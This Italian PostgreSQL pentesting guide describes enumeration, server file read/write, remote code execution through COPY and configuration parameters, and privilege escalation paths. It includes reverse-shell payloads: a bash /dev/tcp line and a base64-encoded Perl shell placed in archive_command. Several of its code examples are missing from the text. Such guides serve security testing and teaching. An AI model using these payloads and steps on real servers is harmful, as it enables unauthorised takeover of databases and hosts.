5432,5433 - Pentesting Postgresql
Usa Trickest per creare facilmente e automatizzare flussi di lavoro supportati dagli strumenti della comunità più avanzati al mondo. Ottieni l'accesso oggi:
Informazioni di base
PostgreSQL è descritto come un sistema di database ad oggetti-relazionale che è open source. Questo sistema non solo utilizza il linguaggio SQL ma lo potenzia anche con funzionalità aggiuntive. Le sue capacità gli permettono di gestire una vasta gamma di tipi di dati e operazioni, rendendolo una scelta versatile per sviluppatori e organizzazioni.
Porta predefinita: 5432, e se questa porta è già in uso sembra che postgresql utilizzerà la porta successiva (probabilmente 5433) che non è in uso.
Connessione e Enumerazione di Base
Se eseguendo \list
trovi un database chiamato rdsadmin
sai di essere all'interno di un database PostgreSQL AWS.
Per ulteriori informazioni su come abusare un database PostgreSQL controlla:
pagePostgreSQL injectionEnumerazione Automatica
Scansione delle porte
Secondo questa ricerca, quando un tentativo di connessione fallisce, dblink
genera un'eccezione sqlclient_unable_to_establish_sqlconnection
che include una spiegazione dell'errore. Di seguito sono elencati esempi di questi dettagli.
Host non disponibile
DETAIL: impossibile connettersi al server: Nessuna route per l'host Il server è in esecuzione sull'host "1.2.3.4" e accetta connessioni TCP/IP sulla porta 5678?
Porta chiusa
La porta è aperta
La porta è aperta o filtrata
In PL/pgSQL functions, it is currently not possible to obtain exception details. However, if you have direct access to the PostgreSQL server, you can retrieve the necessary information. If extracting usernames and passwords from the system tables is not feasible, you may consider utilizing the wordlist attack method discussed in the preceding section, as it could potentially yield positive results.
Enumerazione dei Privilegi
Ruoli
Tipi di Ruoli | |
---|---|
rolsuper | Il ruolo ha privilegi di superutente |
rolinherit | Il ruolo eredita automaticamente i privilegi dei ruoli di cui è membro |
rolcreaterole | Il ruolo può creare altri ruoli |
rolcreatedb | Il ruolo può creare database |
rolcanlogin | Il ruolo può effettuare il login. Questo significa che questo ruolo può essere dato come identificatore di autorizzazione della sessione iniziale |
rolreplication | Il ruolo è un ruolo di replica. Un ruolo di replica può avviare connessioni di replica e creare ed eliminare slot di replica. |
rolconnlimit | Per i ruoli che possono effettuare il login, imposta il numero massimo di connessioni simultanee che questo ruolo può effettuare. -1 significa nessun limite. |
rolpassword | Non la password (viene sempre visualizzata come |
rolvaliduntil | Ora di scadenza della password (utilizzata solo per l'autenticazione tramite password); nullo se non scade |
rolbypassrls | Il ruolo ignora ogni criterio di sicurezza a livello di riga, vedi Sezione 5.8 per ulteriori informazioni. |
rolconfig | Impostazioni predefinite del ruolo per le variabili di configurazione in esecuzione |
oid | ID del ruolo |
Gruppi Interessanti
Se sei membro di
pg_execute_server_program
puoi eseguire programmiSe sei membro di
pg_read_server_files
puoi leggere fileSe sei membro di
pg_write_server_files
puoi scrivere file
Nota che in Postgres un utente, un gruppo e un ruolo sono la stessa cosa. Dipende solo da come lo usi e se permetti il login.
Tabelle
Funzioni
Azioni sul file system
Leggere directory e file
Da questo commit i membri del gruppo definito DEFAULT_ROLE_READ_SERVER_FILES
(chiamato pg_read_server_files
) e super utenti possono utilizzare il metodo COPY
su qualsiasi percorso (controllare convert_and_check_filename
in genfile.c
):
Ricorda che se non sei un super utente ma hai i permessi CREATEROLE puoi renderti membro di quel gruppo:
Ci sono altre funzioni di postgres che possono essere utilizzate per leggere file o elencare una directory. Solo superutenti e utenti con permessi espliciti possono utilizzarle:
Puoi trovare ulteriori funzioni in https://www.postgresql.org/docs/current/functions-admin.html
Scrittura Semplice di File
Solo super utenti e membri di pg_write_server_files
possono utilizzare la copia per scrivere file.
Ricorda che se non sei un super utente ma hai i permessi CREATEROLE
puoi renderti membro di quel gruppo:
Ricorda che COPY non può gestire i caratteri di nuova riga, quindi anche se stai utilizzando un payload base64 devi inviare un comando su una riga sola.
Una limitazione molto importante di questa tecnica è che copy
non può essere utilizzato per scrivere file binari in quanto modifica alcuni valori binari.
Caricamento di file binari
Tuttavia, ci sono altre tecniche per caricare grandi file binari:
pageBig Binary Files Upload (PostgreSQL)Suggerimento per bug bounty: iscriviti a Intigriti, una piattaforma premium per bug bounty creata da hacker, per hacker! Unisciti a noi su https://go.intigriti.com/hacktricks oggi stesso e inizia a guadagnare taglie fino a $100,000!
Aggiornamento dei dati della tabella PostgreSQL tramite scrittura di file locale
Se hai le autorizzazioni necessarie per leggere e scrivere file del server PostgreSQL, puoi aggiornare qualsiasi tabella sul server sovrascrivendo il file associato nel directory dei dati di PostgreSQL. Maggiori informazioni su questa tecnica qui.
Passaggi necessari:
Ottenere il directory dei dati di PostgreSQL
Nota: Se non riesci a recuperare il percorso corrente del directory dei dati dalle impostazioni, puoi interrogare la versione principale di PostgreSQL tramite la query SELECT version()
e provare a forzare il percorso. I percorsi comuni del directory dei dati nelle installazioni Unix di PostgreSQL sono /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. Un nome di cluster comune è main
. 2. Ottenere un percorso relativo al filenode, associato alla tabella di destinazione
Questa query dovrebbe restituire qualcosa come base/3/1337
. Il percorso completo sul disco sarà $DIRECTORY_DEI_DATI/base/3/1337
, cioè /var/lib/postgresql/13/main/base/3/1337
. 3. Scarica il filenode tramite le funzioni lo_*
Ottieni il tipo di dati associato alla tabella di destinazione
Utilizza il PostgreSQL Filenode Editor per modificare il filenode; imposta tutti i flag booleani
rol*
su 1 per le autorizzazioni complete.
(Opzionale) Cancella la cache della tabella in memoria eseguendo una query SQL costosa
Ora dovresti vedere i valori della tabella aggiornati nel PostgreSQL.
Puoi diventare anche un superadmin modificando la tabella pg_authid
. Vedi la seguente sezione.
RCE
RCE al programma
Dal versione 9.3, solo super utenti e membri del gruppo pg_execute_server_program
possono utilizzare copy per RCE (esempio con esfiltrazione:
Esempio da eseguire:
Ricorda che se non sei un super utente ma hai i permessi CREATEROLE
puoi renderti membro di quel gruppo:
Oppure utilizzare il modulo multi/postgres/postgres_copy_from_program_cmd_exec
da metasploit.
Ulteriori informazioni su questa vulnerabilità qui. Sebbene segnalato come CVE-2019-9193, Postges ha dichiarato che si tratta di una funzionalità e non sarà corretto.
RCE con Linguaggi PostgreSQL
pageRCE with PostgreSQL LanguagesRCE con Estensioni PostgreSQL
Una volta che hai imparato dal post precedente come caricare file binari, potresti provare a ottenere RCE caricando un'estensione postgresql e caricandola.
pageRCE with PostgreSQL ExtensionsRCE con file di configurazione PostgreSQL
I seguenti vettori RCE sono particolarmente utili in contesti SQLi limitati, poiché tutti i passaggi possono essere eseguiti tramite istruzioni SELECT nidificate
Il file di configurazione di PostgreSQL è scrivibile dall'utente postgres, che è quello che esegue il database, quindi come superutente, puoi scrivere file nel filesystem e quindi puoi sovrascrivere questo file.
RCE con ssl_passphrase_command
Ulteriori informazioni su questa tecnica qui.
Il file di configurazione ha alcuni attributi interessanti che possono portare a RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Percorso della chiave privata del databasessl_passphrase_command = ''
Se il file privato è protetto da password (criptato) postgresql eseguirà il comando indicato in questo attributo.ssl_passphrase_command_supports_reload = off
Se questo attributo è on, il comando eseguito se la chiave è protetta da password verrà eseguito quando viene eseguitopg_reload_conf()
.
Quindi, un attaccante dovrà:
Dump della chiave privata dal server
Criptare la chiave privata scaricata:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Sovrascrivere
Dump della corrente configurazione di postgresql
Sovrascrivere la configurazione con la configurazione degli attributi menzionati:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Eseguire
pg_reload_conf()
Durante i test ho notato che ciò funzionerà solo se il file della chiave privata ha privilegi 640, è di proprietà di root e del gruppo ssl-cert o postgres (così l'utente postgres può leggerlo), ed è posizionato in /var/lib/postgresql/12/main.
RCE con archive_command
Ulteriori informazioni su questa configurazione e su WAL qui.
Un altro attributo nel file di configurazione che è sfruttabile è archive_command
.
Per far funzionare questo, l'impostazione archive_mode
deve essere 'on'
o 'always'
. Se è vero, allora potremmo sovrascrivere il comando in archive_command
e forzarlo ad eseguire tramite le operazioni WAL (write-ahead logging).
I passaggi generali sono:
Verificare se la modalità di archiviazione è abilitata:
SELECT current_setting('archive_mode')
Sovrascrivere
archive_command
con il payload. Ad esempio, una reverse shell:archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Ricaricare la configurazione:
SELECT pg_reload_conf()
Forzare l'operazione WAL per eseguire, che chiamerà il comando di archiviazione:
SELECT pg_switch_wal()
oSELECT pg_switch_xlog()
per alcune versioni di Postgres
RCE con librerie di caricamento anticipato
Ulteriori informazioni su questa tecnica qui.
Questo vettore di attacco sfrutta le seguenti variabili di configurazione:
session_preload_libraries
-- librerie che verranno caricate dal server PostgreSQL alla connessione del client.dynamic_library_path
-- elenco delle directory in cui il server PostgreSQL cercherà le librerie.
Possiamo impostare il valore di dynamic_library_path
su una directory scrivibile dall'utente postgres
che esegue il database, ad esempio la directory /tmp/
, e caricare un oggetto .so
dannoso lì. Successivamente, forzeremo il server PostgreSQL a caricare la nostra nuova libreria caricata includendola nella variabile session_preload_libraries
.
I passaggi dell'attacco sono:
Scaricare il
postgresql.conf
originaleIncludere la directory
/tmp/
nel valore didynamic_library_path
, ad esempiodynamic_library_path = '/tmp:$libdir'
Includere il nome della libreria dannosa nel valore di
session_preload_libraries
, ad esempiosession_preload_libraries = 'payload.so'
Verificare la versione principale di PostgreSQL tramite la query
SELECT version()
Compilare il codice della libreria dannosa con il pacchetto dev corretto di PostgreSQL Esempio di codice:
Compilare il codice:
Caricare il
postgresql.conf
dannoso, creato nei passaggi 2-3, e sovrascrivere l'originaleCaricare il
payload.so
dal passaggio 5 nella directory/tmp
Ricaricare la configurazione del server riavviando il server o invocando la query
SELECT pg_reload_conf()
Alla successiva connessione al DB, riceverai la connessione della shell inversa.
Postgres Privesc
CREATEROLE Privesc
Concessione
Secondo i documenti: I ruoli che hanno il privilegio CREATEROLE
possono concedere o revocare l'appartenenza a qualsiasi ruolo che non è un superuser.
Quindi, se hai il permesso di CREATEROLE
potresti concederti l'accesso ad altri ruoli (che non siano superuser) che possono darti l'opzione di leggere e scrivere file ed eseguire comandi:
Modifica Password
Gli utenti con questo ruolo possono anche cambiare le password di altri non-superutenti:
Privesc a SUPERUSER
È abbastanza comune scoprire che gli utenti locali possono accedere a PostgreSQL senza fornire alcuna password. Pertanto, una volta ottenuti i permessi per eseguire codice, è possibile sfruttare tali permessi per ottenere il ruolo di SUPERUSER
:
Questo è di solito possibile a causa delle seguenti righe nel file pg_hba.conf
:
ALTER TABLE privesc
In questo articolo è spiegato come sia stato possibile fare privesc in Postgres GCP sfruttando il privilegio ALTER TABLE concesso all'utente.
Quando si cerca di assegnare la proprietà di una tabella a un altro utente, dovresti ricevere un errore che lo impedisce, ma apparentemente GCP ha dato questa opzione all'utente postgres non-superuser in GCP:
Unendo questa idea al fatto che quando i comandi INSERT/UPDATE/ANALYZE vengono eseguiti su una tabella con una funzione di indice, la funzione viene chiamata come parte del comando con i permessi del proprietario della tabella. È possibile creare un indice con una funzione e dare i permessi di proprietario a un super utente su quella tabella, e quindi eseguire ANALYZE sulla tabella con la funzione dannosa che sarà in grado di eseguire comandi perché sta utilizzando i privilegi del proprietario.
Sfruttamento
Inizia creando una nuova tabella.
Inserisci del contenuto non rilevante nella tabella per fornire dati alla funzione di indice.
Sviluppa una funzione di indice dannosa che contiene un payload di esecuzione del codice, consentendo l'esecuzione di comandi non autorizzati.
ALTERA il proprietario della tabella in "cloudsqladmin," che è il ruolo di superutente di GCP utilizzato esclusivamente da Cloud SQL per gestire e mantenere il database.
Esegui un'operazione ANALYZE sulla tabella. Questa azione costringe il motore PostgreSQL a passare al contesto utente del proprietario della tabella, "cloudsqladmin." Di conseguenza, la funzione di indice dannosa viene chiamata con i permessi di "cloudsqladmin," consentendo l'esecuzione del comando shell precedentemente non autorizzato.
In PostgreSQL, questo flusso appare più o meno così:
Quindi, la tabella shell_commands_results
conterrà l'output del codice eseguito:
Accesso Locale
Alcune istanze di postgresql mal configurate potrebbero consentire l'accesso di qualsiasi utente locale, è possibile accedere localmente da 127.0.0.1 utilizzando la funzione dblink
:
Nota che per far funzionare la query precedente è necessario che esista la funzione dblink
. Se non esiste, puoi provare a crearla con
Se hai la password di un utente con più privilegi, ma all'utente non è consentito effettuare il login da un IP esterno, puoi utilizzare la seguente funzione per eseguire query come quell'utente:
È possibile verificare se questa funzione esiste con:
Funzione definita dall'utente con SECURITY DEFINER
Nel seguente articolo, i pentester sono riusciti a ottenere privilegi all'interno di un'istanza di postgres fornita da IBM, perché hanno trovato questa funzione con il flag SECURITY DEFINER:
Come spiegato nella documentazione una funzione con SECURITY DEFINER viene eseguita con i privilegi dell'utente che la possiede. Pertanto, se la funzione è vulnerabile all'Injection SQL o sta eseguendo azioni privilegiate con parametri controllati dall'attaccante, potrebbe essere sfruttata per escalare i privilegi all'interno di postgres.
Nella riga 4 del codice precedente è possibile vedere che la funzione ha il flag SECURITY DEFINER.
E poi eseguire comandi:
Forzare l'accesso con PL/pgSQL
PL/pgSQL è un linguaggio di programmazione completo che offre un maggiore controllo procedurale rispetto a SQL. Consente l'uso di cicli e altre strutture di controllo per migliorare la logica del programma. Inoltre, le istruzioni SQL e i trigger hanno la capacità di invocare funzioni create utilizzando il linguaggio PL/pgSQL. Questa integrazione consente un approccio più completo e versatile alla programmazione e all'automazione del database. È possibile abusare di questo linguaggio per chiedere a PostgreSQL di forzare le credenziali degli utenti.
pagePL/pgSQL Password BruteforcePrivesc sovrascrivendo le tabelle interne di PostgreSQL
Il seguente vettore di privesc è particolarmente utile in contesti di SQLi limitati, poiché tutti i passaggi possono essere eseguiti tramite istruzioni SELECT nidificate
Se puoi leggere e scrivere file del server PostgreSQL, puoi diventare un superutente sovrascrivendo il filenode su disco di PostgreSQL, associato alla tabella interna pg_authid
.
Leggi di più su questa tecnica qui.
I passaggi dell'attacco sono:
Ottenere la directory dei dati di PostgreSQL
Ottenere un percorso relativo al filenode, associato alla tabella
pg_authid
Scaricare il filenode tramite le funzioni
lo_*
Ottenere il tipo di dati associato alla tabella
pg_authid
Utilizzare il PostgreSQL Filenode Editor per modificare il filenode; impostare tutti i flag booleani
rol*
su 1 per le autorizzazioni complete.Ricaricare il filenode modificato tramite le funzioni
lo_*
, e sovrascrivere il file originale sul disco(Opzionale) Svuotare la cache della tabella in memoria eseguendo una query SQL costosa
Ora dovresti avere i privilegi di un superamministratore completo.
POST
logging
All'interno del file postgresql.conf è possibile abilitare i log di postgresql modificando:
Quindi, riavviare il servizio.
pgadmin
pgadmin è una piattaforma di amministrazione e sviluppo per PostgreSQL. È possibile trovare password all'interno del file pgadmin4.db È possibile decifrarle utilizzando la funzione decrypt all'interno dello script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
pg_hba
L'autenticazione del client in PostgreSQL è gestita attraverso un file di configurazione chiamato pg_hba.conf. Questo file contiene una serie di record, ciascuno specificando un tipo di connessione, intervallo di indirizzi IP del client (se applicabile), nome del database, nome utente e il metodo di autenticazione da utilizzare per le connessioni corrispondenti. Il primo record che corrisponde al tipo di connessione, all'indirizzo del client, al database richiesto e al nome utente viene utilizzato per l'autenticazione. Non c'è alcun fallback o backup se l'autenticazione fallisce. Se nessun record corrisponde, l'accesso viene negato.
I metodi di autenticazione basati su password disponibili in pg_hba.conf sono md5, crypt e password. Questi metodi differiscono per come la password viene trasmessa: in formato MD5-hash, crittografata con crypt o in testo normale. È importante notare che il metodo crypt non può essere utilizzato con password che sono state crittografate in pg_authid.
Last updated